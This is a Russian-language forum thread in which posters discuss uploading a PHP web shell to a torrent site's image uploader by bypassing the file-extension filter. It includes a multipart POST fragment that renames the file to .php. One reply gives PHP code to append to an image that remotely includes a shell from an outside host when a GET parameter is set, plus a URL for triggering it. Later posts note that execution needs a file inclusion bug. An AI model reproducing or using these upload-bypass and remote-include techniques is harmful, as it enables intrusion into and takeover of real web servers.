Есть торрент в нем есть заливка картинок. Могу залить картинку и сделать её не jpeg а php. При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php. Code: -----------------------------220022761016327\r\nContent-Disposition: form-data; name="file"; \nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type: и там дальше исходник картинки. А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает. Вобщем кто знает как обойти фильтр. Все делается через post запрос. Или скинте картинку с шелом
Ну так,ты напиши код в конце картинки нужный, и заливай. Например в конце допиши: <? if(isset($_GET['shell'])){ include('http://mysite.com/shel.txt'); } ?> И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже. это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell" но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
Ну так,что бы такой способ сработал,должны быть кое какие условия все же)) нельзя же просто залить картинку,и получить шелл.Вот я и спрашиваю,а какие условия у вас? Моет вы на рапиду льете шелл,кто вас знает
есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif и, нет, шелл не на рапиде естественно.
Обычно это делается, если у тебя под рукой есть инклуд (или ещё что либо). Тупо заливаешь картинку со своим php кодом, и потом инклудишь чтобы код выполнился. А если ты просто залил картинку с php кодом, то просто так он исполнятся не будет ведь.